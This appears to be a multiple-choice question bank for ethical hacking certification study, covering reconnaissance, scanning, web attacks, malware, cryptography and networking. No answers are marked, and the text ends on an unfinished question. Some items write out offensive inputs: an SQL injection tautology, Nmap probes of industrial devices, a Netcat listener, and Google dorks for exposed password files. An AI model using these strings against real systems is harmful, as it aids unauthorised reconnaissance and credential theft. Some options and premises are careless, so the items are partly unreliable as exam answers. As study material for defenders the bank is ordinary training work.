DNS cache snooping. DNS enumeration. DNS tunneling method. There have been concerns in your network that the wireless network component is not sufficiently secure. You perform a vulnerability scan of wireless network and find that it is using an old encryption protocol that was designed to mimic wired encryption What encryption protocol is being used?. RADIUS. WPA. WEP. WPA3. ------------- is the amount of risk that remains after all risk treatment and remediation efforts have been implemented. Residual risk. Impact risk. Accepting risk. Inherent risk. Simple web Interface that lists the collection of potentially actionable, and publicly available information is known as?. Open-source intelligence framework. Real intelligence framework. Social intelligence framework. Human intelligence framework. Which option would you use to scan fewer ports than the default scan using Nmap tool?. -r. -F. -p. -sP. DNS cache snooping is a type of DNS enumeration technique in which an attacker queries the DNS server for a specific cached DNS record. By using this cached record, the attacker can determine the sites recently visited by the user. What command is used to determine if the entry is present in DNS cache?. nslookup -fullrecursive www.ABCompany.com. dnsnooping -rt www.ABCompany.com. nslookup -norecurse www.ABCompany.com. dns --snoop www.ABCompany.com. Vulnerability scanning is performed to identify vulnerabilities and misconfigurations in a target web server or network. The first step in vulnerability scanning is: OS Detection. Firewall detection. TCP/UDP Port scanning. Checking if the remote host is alive. An attacker gains control over a user account and attempts to acquire access to another account's confidential files and information. How can he do this?. Privilege Escalation. Shoulder-Surfing. Hacking Active Directory. Port Scanning. --------------- is usually targeted at Microsoft Office products?. Polymorphic virus. Multipartite virus. Macro virus. Stealth virus. 
To ensure employees do what they’re supposed to, some employers have begun using surveillance apps and programs to monitor worker productivity. From a legal point of view, what consequences can this have?. This can slow down the network. Employers do not allow to monitor employees. To prevent invasion of privacy, the Employers can inform employees that they are being monitored. Employees should not accept it. As a penetration tester, you find an employee list in Google and you send her an email changing the source email to her boss's email (manager@XYZ.com) and ask her some information in pdf format. She reads your email and sends back a pdf with links. You exchange the links in the PDF file with your malicious links and send back the modified pdf, saying that the links don't work. She reads your email, opens the links, and her machine gets infected. You now have access to the company network. What attacking method did you use?. Social engineering. Piggybacking. Tailgating. Eavesdropping. With botnets, the attacker can use several techniques to scan vulnerable machines. The attacker first creates a list of a large number of vulnerable machines, Then, they infect the machines to find the newly compromised machines. On finding one, the attacker installs malicious code on it and divides the list in half. This technique ensures the installation of malicious code on all the potentially vulnerable machines in a short time. The technique which is discussed here is: Subnet scanning technique. Permutation scanning technique. Hit-list scanning technique. Topological scanning technique. To withdraw money from an ATM machine, you are using your smart card and PIN, in this case you are using a two-factor authentication that satisfies: Something you are and something you remember. Something you have and something you know. Something you know and something you are. Something you have and something you are. 
-------------- is an extremely common IDS evasion technique used by attackers?. Spyware. Subnetting. Unicode Characters. Port Knocking. Clients of a company tried to connect to the main site of the company but they were redirected to a malicious site. Cybersecurity team, found that they were victims of DNS Cache Poisoning. What should security team do to deal with threats like this?. The change of Anti-Virus. The use of DNSSEC. The use of multi-Factor authentication. Client training and awareness. While You are connecting to your online bank account, you receive an email with a link. You click on the link and it opens another Web page and displays a video. Later, you receive an email from your bank showing that someone accessed to your bank account. What Web browser-based security vulnerability was exploited to compromise the user?. Clickjacking. Cross-Site Scripting. Cross-Site Request Forgery. Web form input validation. In an SQL injection attack, the attacker injects malicious code through an SQL query that can read sensitive data and even can modify (insert/update/delete) it. Which of the following SQLi types leverages a database server's ability to make DNS requests to pass data to an attacker?. In-band SQLi. Union-based SQLi. Out-of-band SQLi. Time-based blind SQLi. Bob's computer is configured to join an 802.11 network. His computer is same as many other users in the network. He can find the WIFI but he is not able to connect. He uses a wireless packet sniffer and it shows that the Wireless Access Point (WAP) is not responding to the association requests from his computer. What is a possible source of this problem?. Client's MAC address doesn't match the AP's access list. The SSID of the wireless network is hidden. Client is configured for the wrong channel. DHCP is not enabled on the wireless client. An attacker infected a public computer and a user connected his iPhone mobile to this computer. 
The user then enabled iTunes Wi-Fi sync on the computer so that the device could continue communication with that computer even after being physically disconnected. Now, the attacker gains access to the user's iPhone through the infected computer and is able to monitor and read all of user's activity on the iPhone, even after the device is out of the communication zone. Which of the following attacks is performed by attacker in the above scenario?. Man-in-the-disk attack. iOS jailbreaking. iOS trustjacking. Signalling System 7 vulnerability. Which of the following tools an attacker can employ to gather information related to the model of the IoT device and the certifications granted to it?. FCC ID search. Google Lens. Shodan.io. EarthExplorer. What is the component of the Docker architecture that can process API requests and handle various Docker objects, such as containers, volumes, images, and networks?. Docker objects. Docker daemon. Docker client. Docker registries. Which PKI components can Issue and verify digital certificates?. KDC. CR. CBC. CA. Biometrics is the measurement and statistical analysis of people's unique physical and behavioral characteristics. Which option is the least-likely physical characteristic to be used in biometric control?. Iris patterns. Voice. Height and Weight. Fingerprints. To maximize the trust level of a phishing message, hackers create the email to look similar to the internal email used by the target company. They normally add logos and use the name of the company CEO, or Managers. Gathering information about the target organization by searching the Internet or through social engineering is known as?. Internet searching. Investigation. Reconnaissance. Enumeration. ICMP and Ping may be disabled on a target computer. Which tool can you use to get a response from a host using TCP?. Traceroute. Hping. TCP ping. Broadcast ping. 
What document lists the detailed guidelines and constraints regarding the execution of information security testing. It is established before the start of a security test, and gives the test team authority to conduct defined activities without the need for additional permissions?. Service Level Agreement. Project Scope. Rules of Engagement. Non-Disclosure Agreement. A penetration test considered to be more accurate than vulnerability scan, Because: vulnerability scanning is offensive in nature. A penetration test attempts to actively exploit weaknesses in an environment, while vulnerability scanning checks for known vulnerabilities and generates a report on risk exposure. A penetration test is often performed by an automated tool, while a vulnerability scan is always a human factor involved. Penetration testers Typically conducted by in-house staff using authenticated credentials; does not require a high skill level. An organization that has experienced a possible breach of security, asks you as an incident investigator to check the event logs from all firewalls, proxy servers, and Intrusion Detection Systems (IDS) on the network. During checking you find out that the sequence of many of the logged events do not match up. What is the most likely cause?. The network devices are not all synchronized. A network outage was the root casue. The attacker manipulated and tweaked event logs. It can be a false alarm. Ransomware is a type of malware that uses encryption to block a user's access to his/her device either by locking the screen or by locking the user's files. Which of the following is the best countermeasure an organisation can use to help avoid or reduce the impact of ransomware?. Use multiple antivirus softwares. Pay the ransom. Store backups offsite. Analyse the ransomware and search to find the decryption key. ABCompany is worried about someone tracking it online with a packet sniffer. Which option is the BEST way to defend against network sniffing?. 
Encrypt all the traffic that leaves your system. Use Endpoint Protection solutions and keep all servers updated (patched). Assign fixed IP addresses by DHCP. Access the server room via controlled doors only. SOC tools in your company, show a high number of outbound connections from your internal IP addresses to a single public IP address. After further analysis, you find out that this Public IP is a blacklisted IP, and the internal communicating devices are compromised. What kind of attack does the above scenario demonstrate?. Botnet Attack. Spear Phishing Attack. Advanced Persistent Threats. Rootkit Attack. To take down web infrastructure using a DDoS attack, attacker sends Partial HTTP requests to the web infrastructure or applications. Upon receiving a partial request, the target server opens multiple connections and keeps waiting for the requests to complete. Which attack is being described here?. Desynchronization. Slowloris attack. Session splicing. Phlashing. Cookies are small packets of data saved as text files on the web browser of your computer or other devices, from a security perspective, you could consider regularly clearing the cookies from your computer or device. What sort of security breach is it attempting to mitigate?. Might upload malicious programs or obtain passwords. Access the authentication cookie to hijack the victim's session. Intercept confidential data delivered in JSON format. Execute scripts in the user's web browser. Your firewall is configured to allow outbound HTTP traffic, while IRC traffic over port 80 from a compromised web enabled host got blocked. What type of firewall is inspecting outbound traffic?. Circuit. Stateful. Application. Packet Filtering. In your network, the website is no longer accessible. The website's IP address is 12.34.56.78 and you are able to ping it. The website is accessible with its IP but users are not able to access it using its URL (www.ABCompany.com). What may be the problem?. UDP Port 53 is Blocked. 
TCP Port 80 is Blocked. TCP Port 54 is Blocked. UDP Port 80 is Blocked. Which option is a web server scanner which performs vulnerability scanning against web servers for multiple items including dangerous files, CGI and programs?. Nikto. John the Ripper. Dsniff. Snort. To evaluate SQL injection attack, an ethical hacker performs two commands, first command is to test the response time of a true or false response using SQL injection attack and second command to determine whether the database will return true or false results for user IDs? Which option is correct regarding the SQL injection types that is used by the ethical hacker?. Out of band and boolean-based. Union-based and error-based. Time-based and union-based. Time-based and boolean-based. A user has downloaded and installed a gaming app in a third-party app store. Once the user has installed the app, all the legitimate apps in his smartphone were replaced by deceptive applications that appeared legitimate. He also received many advertisements on his smartphone after installing the app. What is the attack performed in the above scenario?. SIM card attack. Clickjacking. SMS phishing attack. Agent Smith attack. What port is often used by Infected IoT devices to spread malware and send results to the threat actor?. 22. 48101. 80. 443. Attackers initiate spear-phishing emails with custom-made malware to compromise user accounts of staff members or cloud service firms to obtain confidential information. an attacker infiltrates target MSP provider and distributes malware to gain remote access. The attacker then accesses the target customer profiles with his/her MSP account, compresses the customer data, and stores them in the MSP. The attacker then extracts the information from the MSP and uses that information to launch further attacks on the target organization and users. Which of the following options did attackers perform in the above scenario?. Cloud cryptojacking. Man-in-the-cloud (MITC) attack. 
Cloud hopper attack. Cloudborne attack. Alex a pen-tester, to detect viruses in the systems, uses a detection method where anti- virus executes the malicious codes on a virtual machine to simulate CPU and memory activities. Which type of virus detection method did Alex use in this context?. Heuristic Analysis. Code Emulation. Scanning. Integrity checking. ------------------ is an attack where the attackers exploit vulnerabilities in dynamically generated web pages to inject client-side script into web pages viewed by other users. LDAP Injection attack. Cross-Site Scripting (XSS). SQL injection attack. Cross-Site Request Forgery (CSRF). ---------------- file contains information of your package, including components of the application such as activities, services, broadcast receivers, content providers in an Android application?. AndroidManifest.xml. classes.dex. APK.info. resources.asrc. ABCompany, a power plant company, has connected all the industrial control systems to the Internet to automate the operation of critical infrastructure from a remote location. To empower manufacturers and utility companies to ensure the reliability of their industrial networks confidently to avoid downtime and disruption of service continuity, the organization decided to install an OT security tool. Which tool ABCompany can use to protect its critical infrastructure?. Robotium. BalenaCloud. Flowmon. IntentFuzzer. Using which cloud-hosted solution, the provider will take care of the hardware, operating system, and software administration including patching and monitoring. In this case the only administrative task that your company will need to perform is the management of user accounts. Iaas. Saas. PaaS. Caas. ---------------- is a security architecture developed to increase the confidentiality of information exchanged over the insecure Internet. SOA. biometrics. single sign on. PKI. Sending email using SMTP does not encrypt email. 
It means an unauthorized person can read the emails. To encrypt it you are able to upgrade a connection between two mail servers to use TLS. Email transmitted by SMTP over TLS is encrypted. What is the name of the command used by SMTP to transmit email over TLS?. EXPLICITTLS. UPGRADETLS. IMPLICITTLS. STARTTLS. Shellshock is a vulnerability in the Bash shell, a user interface that uses a command-line interface to access an operating system’s services. Which operating systems and devices are NOT known to be affected directly by the Shellshock vulnerability?. Linux. Unix. OS X. Windows. ------------- is a layer 3 protocol that you can use it for end-to-end encryption of the FTP traffic which is not encrypted by default??. SFTP. Ipsec. SSL. FTPS. A user in XYZ company visits a web site which contains interesting and attractive content like 'Do you want to win iPhone 13? He clicks the link which in reality is an invisible iframe which is setup by the attacker, so the victim thinks that he clicks on the 'Do you want to win iPhone 13? Which of the following attacks is described above?. Session Fixation. HTML Injection. HTTP Parameter Pollution. Clickjacking Attack. Bob performs a syn scan in ABCompany network and he finds that the syslog server (192.168.10.15) is not receiving the alert message from snort (192.168.10.10). He runs Wireshark in the snort server to check if the messages are going to the syslog server. What Wireshark filter will show the connections from the snort machine to kiwi syslog machine?. tcp.srcport= = 514 && ip.src= = 192.168.10.10. tcp.srcport= = 514 && ip.src= = 192.168.10.15. tcp.dstport= = 514 && ip.dst= = 192.168.10.10. tcp.dstport= = 514 && ip.dst= = 192.168.10.15. To assess the security of the email gateway, you craft the below email message and send it across the Internet to a user of ABCompany.com. 
From: assess@ABCompany.com To: user@ABCompany.com Subject: Security assessment Date: 9/9/2022 10:25 If The user receives your email, it proves ABCompany.com email gateway doesn't prevent ----------------. Email Masquerading. Email Harvesting. Email Phishing. Email Spoofing. You have received an email from your manager and he asked you to add a rule on the firewall to allow RDP access to some internal servers from the Internet. Next week, your manager denies that he had ever sent any mail. Which of the following proves that it was your manager who has sent the Email?. Non-Repudiation. Integrity. Authentication. Confidentiality. Session splicing is an IDS evasion technique that exploits how some IDS do not reconstruct sessions before pattern-matching the data. The attacker divides the data in the packets into small portions of a few bytes and evades the string match while delivering the data. Which tool can be used to perform session splicing attacks?. tcpsplice. Burp. Hydra. Whisker. From the security point of view, we need to disable or remove unnecessary ISAPI filters, to -------. Mitigate the risks of social engineering attacks. Mitigate the risks of webserver attacks. Mitigate the risks of SQL injection attacks. Mitigate the risks of WAP attacks. In a Web browser, the following URL is requested: http://www.mydomain.com/example.asp?accountnumber=12345&debitamount=1 An attacker may change the accountnumber and debitamount in order to debit another account: http://www.mydomain.com/example.asp?accountnumber=67891&debitamount=9999 Which type of vulnerability is present on this site?. Cookie Tampering. SQL Injection. Web Parameter Tampering. XSS Reflection. To perform an SQL injection attack on a target website, Bob is using an evasion technique by placing characters such as "` or '1'='1'" in any basic injection statement such as "or 1=1" or with other accepted SQL comments. Which of the following evasion technique is used by Bob?. Char encoding. IP fragmentation. 
Variation. Null byte. ----------------- is an 802.11 Layer-2 wireless network detector, sniffer, and intrusion detection system. The program runs under Linux, FreeBSD, NetBSD, OpenBSD, and macOS. Kismet. Abel. Netstumbler. Nessus. Alex is going to Jailbreak his IOS device. In this technique he turns the device off and back on, the device will start up completely and the kernel will be patched without the help of a computer, in other words, the device will be jailbroken after each reboot. Which IOS jailbreaking technique he is going to use?. Tethered jailbreaking. Semi-untethered jailbreaking. Semi-tethered jailbreaking. Untethered jailbreaking. To scan open ports and running services on systems connected to the organization's OT network, hackers use an Nmap command to identify Ethernet/IP devices connected to the Internet and further gathered information such as the vendor name, product code and name, device name, and IP address. Which of the following Nmap command helps attackers to retrieve the required information?. nmap -Pn -sT --scan-delay 1s --max-parallelism 1 -p < Port List > < Target IP >. nmap -Pn -sU -p 44818 --script enip-info < Target IP >. nmap -Pn -sT -p 46824 < Target IP >. nmap -Pn -sT -p 102 --script s7-info < Target IP >. Using which cloud deployment option, a customer can join with a group of users or organizations to share a cloud environment. Private. Community. Public. Hybrid. IPsec is a group of protocols that are used together to set up secured connections between devices. It helps keep data sent over public networks secure. Which of the following options is NOT a feature of IPsec. Protect the payload and the headers. Encrypt. Work at the Data Link Layer. Authenticate. Incident handling and response (IH&R) is the process of taking organized and careful steps when reacting to a security incident or cyberattack. 
In which phase the IH&R team further analyses the compromised device to find incident details such as the type of attack, its severity, target, impact, and method of propagation, and any vulnerabilities it exploited. Incident triage. Preparation. Incident recording and assignment. Eradication. An attacker is surfing the internet and trying to gather information about a company. Which hacking process is it calling?. Scanning. Footprinting. Enumeration. System Hacking. A white hat hacker runs Nmap scan with -oX switch, what does this flag do in an Nmap scan?. Perform an eXpress scan. Output the results in truncated format to the screen. Output the results in XML format to a file. Perform an Xmas scan. Which of the following is a set of extensions to DNS that provide protection against known threats to the DNS and authenticate responses to domain name lookups?. DNSSEC. Resource records. Resource transfer. Zone transfer. Which of the following viruses tries to hide from antivirus programs by actively altering and corrupting the service call interrupts while running. The virus code replaces the requests to perform operations with respect to these service call interrupts. Macro virus. Stealth/Tunneling virus. Cavity virus. Polymorphic virus. A hacker found a zero-day vulnerability on a server. She called the owner of the server to let them know about the vulnerability and how they can protect themselves from that vulnerability. She also sent an email to the vendor describing the problem. What type of hacker is she?. Black hat. White hat. Gray hat. Red hat. Container technology has a five-tier architecture, which of the following tiers of the container technology architecture allows verifying and validating image contents, signing images, and sending them to the registries. Tier-1: Developer machines. Tier-2: Testing and accreditation systems. Tier-3: Registries. Tier-4: Orchestrators. What is the best way to pass traffic undetected and evade IDS?. 
Install Netcat and encrypt all outgoing traffic from this server. Use HTTP to pass traffic and evade the internal IDS. Install Cryptcat and encrypt outgoing packets from this server. Use Telnet to encrypt all outgoing traffic from this server. Which of these devices would not be considered part of the Internet of Things?. Smartphone. Thermostat. Light bulb. Set-top cable box. If you wanted a lightweight protocol to send real-time data over, which of these would you use?. TCP. HTTP. ICMP. UDP. What order, from bottom to top, does the TCP/IP architecture use?. Network Access, Network, Transport, Application. Link, Internet, Transport, Application. Physical, Network, Session, Application. Data Link, Internet, Transport, Application. Which of these services would be considered a storage as a service solution?. Microsoft Azure. iCloud. Google Compute. DropLeaf. The UDP headers contain which of the following fields?. Source address, destination address, checksum, length. Destination port, source port, checksum, length. Flags, source port, destination port, checksum. Length, checksum, flags, address. What are the three steps in the TCP handshake as described by the flags set?. SYN, SYN/URG, RST. ST, SYN, ACK. SYN, SYN/ACK, ACK. SYN, SYN/ACK, ACK/URG. Which of these protocols would be used to communicate with an IoT device?. ICMP. SMTP. Telnet. HTTP. Which network topology are you most likely to run across in a large enterprise network?. Ring topology. Bus topology. Full mesh. Star-bus hybrid. If you were to see the subnet mask 255.255.252.0, what CIDR notation (prefix) would you use to indicate the same thing?. /23. /22. /21. /20. Which of these addresses would be considered a private address (RFC 1918 address)?. 172.128.10.5. 9.10.10.7. 172.20.128.240. 250.28.17.10. If you were looking for the definitive documentation on a protocol, what would you consult?. Request for comments. Manual pages. Standards. IEEE. The PDU for TCP is called a ______________. Packet. Datagram. 
Frame. Segment. 13. Which header field is used to reassemble fragmented IP packets?. Source address. IP identification. Don’t fragment bit. Acknowledgment field. 14. Which protocol is necessary to enable the functionality of traceroute?. HTTP. SNMP. ICMP. IP. 15. What is a MAC address used for?. Addressing systems over a VPN. Addressing systems through a tunnel. Addressing systems over TCP. Addressing systems on the local network. To remove malware from the network before it gets to the endpoint, you would use which of the following?. Packet filter. Application layer gateway. Unified threat management appliance. Stateful firewall. If you were on a client engagement and discovered that you left an external hard drive with essential data on it at home, which security principle would you be violating?. Confidentiality. Integrity. Nonrepudiation. Availability. How would you calculate risk?. Probability * loss value. Probability * mitigation factor. (Loss value + mitigation factor) * (loss value/probability). Probability * mitigation factor. Which of the following is one factor of a defense-in-depth approach to network design?. Switches. Using Linux on the desktop. Optical cable connections. Access control lists on routers. How would you ensure that confidentiality is implemented in an organization?. Watchdog processes. Encryption. Cryptographic hashes. Web servers. 6. An intrusion detection system can perform which of the following functions?. Block traffic. Filter traffic based on headers. Generate alerts on traffic. Log system messages. Which of these would be an example of a loss of integrity?. User making changes to a file and saving it. Bad blocks flagged on disk. Credit cards passed in cleartext. Memory failures causing disk drivers to run incorrectly. What would you use a security information event manager for?. Aggregating and providing search for log data. Managing security projects. Escalating security events. Storing open source intelligence. 
Why is it important to store system logs remotely?
- Local systems can't handle it
- Bandwidth is faster than disks
- Attackers might delete local logs
- It will defend against attacks

What would be necessary for a TCP conversation to be considered established by a stateful firewall?
- Final acknowledgment message
- Three-way handshake complete
- Sequence numbers aligned
- SYN message received

What is the purpose of a security policy?
- To provide high-level guidance on the role of security
- To provide specific direction to security workers
- To increase the bottom line of a company
- To align standards and practices

What additional properties does the Parkerian hexad offer over the CIA triad?
- Confidentiality, awareness, authenticity
- Utility, awareness, possession
- Utility, possession, authenticity
- Possession, control, authenticity

What important event can be exposed by enabling auditing?
- System shutdown
- Service startup
- Package installation
- User login

What can an intrusion prevention system do that an intrusion detection system can't?
- Generate alerts
- Block or reject network traffic
- Complete the three-way handshake to bogus messages
- Log packets

Which of these is an example of an application layer gateway?
- Web application firewall
- Runtime application self-protection
- Java applet
- Intrusion prevention system

Which information would a packet filter use to make decisions about what traffic to allow into the network?
- HTTP REQUEST message
- Ethernet type
- UDP source port
- SNMP OID

Which of the following products might be used as an intrusion detection system?
- Elastic Stack
- Prewikka
- Snort
- Snorby

Which of these isn't an example of an attack that compromises integrity?
- Buffer overflow
- Man in the middle
- Heap spraying
- Watering hole

What type of attack could lead to a direct compromise of availability?
- Watering hole
- DoS
- Phishing
- Buffer overflow

What important function can EDR offer to security operations staff?
- Host isolation
- Malware detection
- Remote data collection
- All of the above

Which type of security control is a firewall?
- Administrative
- Physical
- Technical
- Corrective

Management has been informed of a risk to personally identifiable information (PII) that results from an application being developed and managed by the company. They have chosen not to do anything with the risk. What risk management approach have they taken?
- Risk transference
- Risk avoidance
- Risk mitigation
- Risk acceptance

You've been asked to implement a set of standards to support a policy. What type of security control are you developing?
- Administrative
- Corrective
- Logical
- Functional

Your risk management team has asked for a technical control that could mitigate the risk that may be associated with insider threat. Which of these controls would work for that?
- Security policy
- Identity and access management (IAM) solution
- Security standards
- Host-based firewall

An attacker has registered the domain name facebookmailings.com, which will be used to send phishing messages out. Which of the MITRE ATT&CK Framework categories would that fall into?
- Initial access
- Lateral movement
- Credential access
- Resource development

If you were checking on the IP addresses for a company in France, what RIR would you be checking with for details?
- ARIN
- RIPE
- AfriNIC
- LACNIC

You need to identify all Excel spreadsheets available from the company Example, Inc., whose domain is example.com. What search query would you use?
- site:example.com files:pdf
- site:excel files:xls
- domain:example.com filetype:xls
- site:example.com filetype:xls

If you found a colleague searching at pgp.mit.edu, what would they likely be looking for?
- Email addresses
- Company keys
- Executive names
- Privacy policies

What information could you get from running p0f?
- Local time
- Remote time
- Absolute time
- Uptime

The DNS server where records for a domain belonging to an organization or enterprise reside is called the ____________ server.
- Caching
- Recursive
- Authoritative
- Local

What strategy does a local, caching DNS server use to look up records when asked?
- Recursive
- Serial
- Combinatorics
- Bistromathics

What would you use a job listing for when performing reconnaissance?
- Executive staff
- Technologies used
- Phishing targets
- Financial records

What tool could be used to gather email addresses from Bing, Google, and other sources?
- whois
- dig
- netstat
- theHarvester

What social networking site would be most likely to be useful in gathering information about a company, including job titles?
- Twitter
- LinkedIn
- Foursquare
- Facebook

You see the following text written down: port:502. What does that likely reference?
- Shodan search
- I/O search
- p0f results
- RIR query

What would you use Wappalyzer for?
- Analyzing web headers
- Analyzing application code
- Identifying web headers
- Identifying web technologies

What technique would you ideally use to get all the hostnames associated with a domain?
- DNS query
- Zone copy
- Zone transfer
- Recursive request

What information would you not expect to find in the response to a whois query about an IP address?
- IP address block
- Domain association
- Address block owner
- Technical contact

What would you be looking for with the Google query filetype:txt Administrator:500:?
- Text files owned by the administrator
- Administrator login from file
- Text files including the text Administrator:500:
- 500 administrator files with text

What command would you use to get the list of mail servers for a domain?
- whois mx zone=domain.com
- netstat zone=domain.com mx
- dig domain.com @mx
- dig mx domain.com

What would you get from running the command dig ns domain.com?
- Mail exchanger records for domain.com
- Name server records for domain.com
- Caching name server for domain.com
- IP address for the hostname ns

If you wanted to locate detailed information about a person using either their name or a username you have, which website would you use?
- peekyou.com
- twitter.com
- intelius.com
- facebook.com

If you were looking for detailed financial information on a target company, with what resource would you have the most success?
- LinkedIn
- Facebook
- EDGAR
- MORTIMER

What financial filing is required for public companies and would provide you with the annual report?
- 10-Q
- 11-K
- 401(k)
- 14A

If you were looking up information about a company in New Zealand, which RIR would you be looking in for data?
- AfriNIC
- RIPE
- APNIC
- LACNIC

What record would you use to identify a name server associated with a specific domain?
- TXT
- MX
- NS
- PTR

What would you use the website PeekYou for?
- DNS lookup
- Person search
- Identifying domain registrars
- Identifying IoT devices

The following performs two DNS queries. What two records are referenced in this query response?

```
host www.wiley.com
www.wiley.com is an alias for www.wiley.com.cdn.cloudflare.net.
www.wiley.com.cdn.cloudflare.net has address 104.18.17.99
```

- CNAME, A
- CNAME, PTR
- A, PTR
- PTR, MX

What are you looking for with the following Google dork, or Google query? site:pastebin.com intext:password.txt
- Pasted passwords
- Binary data for a password program
- A file of passwords on a common storage website
- Plaintext usernames and passwords

What would you use the tool Sherlock for?
- Searching for fingerprints
- Looking up job information
- Looking for potential usernames
- Searching domain registrars

What is the focus of a security audit or vulnerability assessment?
- Locating vulnerabilities
- Locating threats
- Enacting threats
- Exploiting vulnerabilities

What kind of physical access device restricts access to a single individual at any one time?
- Checkpoint
- Perimeter security
- Security zones
- Mantrap

Which of the following is a mechanism for managing digital certificates through a system of trust?
- PKI
- PKCS
- ISA
- SSL

Which protocol is used to create a secure environment in a wireless network?
- WAP
- WPA
- WTLS
- WML

What type of exercise is conducted with full knowledge of the target environment?
- White box
- Gray box
- Black box
- Glass box

You want to establish a network connection between two LANs using the Internet. Which technology would best accomplish that for you?
- IPSec
- L2TP
- PPP
- SLIP

Which design concept limits access to systems from outside users while protecting users and systems inside the LAN?
- DMZ
- VLAN
- I&A
- Router

In the key recovery process, which key must be recoverable?
- Rollover key
- Secret key
- Previous key
- Escrow key

Which kind of attack is designed to overload a system or resource, taking it temporarily or permanently offline?
- Spoofing
- Trojan
- Man in the middle
- SYN flood

Which component of an NIDS collects data?
- Data source
- Sensor
- Event
- Analyzer

What is the process of making an operating system secure from attack called?
- Hardening
- Tuning
- Sealing
- Locking down

The integrity component provides which feature of the CIA triad?
- Verification that information is accurate
- Verification that ethics are properly maintained
- Establishment of clear access control of data
- Verification that data is kept private and secure

Which mechanism is used by PKI to allow immediate verification of a certificate's validity?
- CRL
- MD5
- SSHA
- OCSP

Which of the following is used to create a VLAN from a physical security perspective?
- Hub
- Switch
- Router
- Firewall

A user has just reported that he downloaded a file from a prospective client using IM. The user indicates that the file was called account.doc. The system has been behaving unusually since he downloaded the file. What is the most likely event that occurred?
- Your user inadvertently downloaded a macro virus using IM
- Your user may have downloaded a rootkit
- Your user may have accidentally changed a setting on the system
- The system is unstable due to the use of IM

Which mechanism or process is used to enable or disable access to a network resource based on attacks that have been detected?
- NIDS
- NIPS
- NITS
- NADS

Which of the following would provide additional security to an Internet web server?
- Changing the default port for traffic to 80
- Changing the default port for traffic to 1019
- Changing the default port for traffic to 443
- Changing the default port for traffic to 161

What type of program exists primarily to propagate and spread itself to other systems and can do so without interaction from users?
- Virus
- Trojan horse
- Logic bomb
- Worm

An individual presents herself at your office claiming to be a service technician. She is attempting to discuss technical details of your environment such as applications, hardware, and personnel used to manage it. This may be an example of what type of attack?
- Social engineering
- Access control
- Perimeter screening
- Behavioral engineering

Which of the following is a major security problem with FTP?
- Password files are stored in an unsecure area on disk
- Memory traces can corrupt file access
- User IDs and passwords are unencrypted
- FTP sites are unregistered

Which system would you install to provide detective capabilities within a network?
- NIDS
- HIDS
- NIPS
- HIPS

The process of maintaining the integrity of evidence and ensuring no gaps in possession occur is known as what?
- Security investigation
- Chain of custody
- Three As of investigation
- Security policy

What encryption process uses one piece of information as a carrier for another?
- Steganography
- Hashing
- MDA
- Cryptointelligence

Which policy dictates how assets can be used by employees of a company?
- Security policy
- User policy
- Use policy
- Enforcement policy
- Acceptable use policy

Which algorithm is an asymmetric encryption protocol?
- RSA
- AES
- DES
- 3DES

Which of the following is an example of a hashing algorithm?
- ECC
- PKI
- SHA
- MD

Which of the following creates a fixed-length output from a variable-length input?
- MD5
- MD7
- SHA12
- SHA8

Granting access to a system based on a factor such as an individual's retina during a scan is an example of what type of authentication method?
- Smart card
- I&A
- Biometrics
- CHAP

What item is also referred to as a physical address to a computer system?
- MAC
- DAC
- RBAC
- STAC

What is the process of investigating a computer system for information relating to a security incident?
- Computer forensics
- Virus scanning
- Security policy
- Evidence gathering

Which of the following is seen as a replacement for protocols such as Telnet and FTP?
- SSL
- SCP
- Telnet2
- SSH

Which of the following is commonly used to create thumbprints for digital certificates?
- MD5
- MD7
- SHA12
- SHA8

Granting access to a system based on a factor such as a password is an example of what?
- Something you have
- Something you know
- Something you are
- Something you smell

What item is also referred to as a logical address to a computer system?
- IP address
- IPX address
- MAC address
- SMAC address

How many bits are in an IPv6 address?
- 32
- 64
- 128
- 256

Enumeration is useful to system hacking because it provides __________.
- Passwords
- IP ranges
- Configuration
- Usernames

What does the enumeration phase not discover?
- Services
- User accounts
- Ports
- Shares

How would you use Netcat to set up a server on a system?
- nc -l -p 192.168.1.1
- nc -l -p 1000
- nc -p -u 1000
- nc -l -p -t 192.168.1.1

__________ is the process of exploiting services on a system.
- System hacking
- Privilege escalation
- Enumeration
- Backdoor

How is a brute-force attack performed?
- By trying all possible combinations of characters
- By trying dictionary words
- By capturing hashes
- By comparing hashes

A __________ is a type of offline attack.
- Cracking attack
- Rainbow attack
- Birthday attack
- Hashing attack

An attacker can use a(n) __________ to return to a system.
- Backdoor
- Cracker
- Account
- Service

A __________ is used to represent a password.
- NULL session
- Hash
- Rainbow table
- Rootkit

A __________ is a file used to store passwords.
- Network
- SAM
- Database
- NetBIOS

__________ is a hash used to store passwords in older Windows systems.
- LM
- SSL
- SAM
- LMv2

__________ is used to partially encrypt the SAM.
- SYSKEY
- SAM
- NTLM
- LM

Which system should be used instead of LM or NTLM?
- NTLMv2
- SSL
- Kerberos
- LM

NTLM provides what benefit versus LM?
- Performance
- Security
- Mutual authentication
- SSL

ADS requires what to be present?
- SAM
- Domain
- NTFS
- FAT

What utility may be used to stop auditing or logging of events?
- ADS
- LM
- NTFS
- Auditpol

On newer Windows systems, what hashing mechanism is disabled?
- Kerberos
- LM
- NTLM
- NTLMv2

Which of the following is a utility used to reset passwords?
- TRK
- ERC
- WinRT
- IRD

A good defense against password guessing is __________.
- Complex passwords
- Password policy
- Fingerprints
- Use of NTLM

If a domain controller is not present, what can be used instead?
- Kerberos
- LM
- NTLMv1
- NTLMv2

Alternate Data Streams are supported in which file systems?
- FAT16
- FAT32
- NTFS
- CDFS

Which of the following best describes a web application?
- Code designed to be run on the client
- Code designed to be run on the server
- SQL code for databases
- Targeting of web services

__________ is a client-side scripting language.
- JavaScript
- ASP
- ASP.NET
- PHP

Which of the following is an example of a server-side scripting language?
- JavaScript
- PHP
- SQL
- HTML

Which of the following is used to access content outside the root of a website?
- Brute force
- Port scanning
- SQL injection
- Directory traversal

Which of the following can prevent bad input from being presented to an application through a form?
- Request filtering
- Input validation
- Input scanning
- Directory traversing

__________ can be used to identify a web server.
- Session hijacking
- Banner grab
- Traversal
- Header analysis

In the field of IT security, the concept of defense in depth is layering more than one control on another. Why would this be helpful in defending a system against session hijacking?
- To provide better protection
- To build dependency among layers
- To increase logging ability
- To satisfy auditors

Which of the following is used to set permissions on content in a website?
- HIDS
- ACE
- ACL
- ALS

What could be used to monitor application errors and violations on a web server or application?
- HIDS
- HIPS
- NIDS
- Logs

Which of the following is an attribute used to secure a cookie?
- Encrypt
- Secure
- HttpOnly
- Domain

A POODLE attack targets what exactly?
- SSL
- TLS
- VPN
- AES

What is used to store session information?
- Cookie
- Snoop
- Directory
- File

Which attack can be used to take over a previous session?
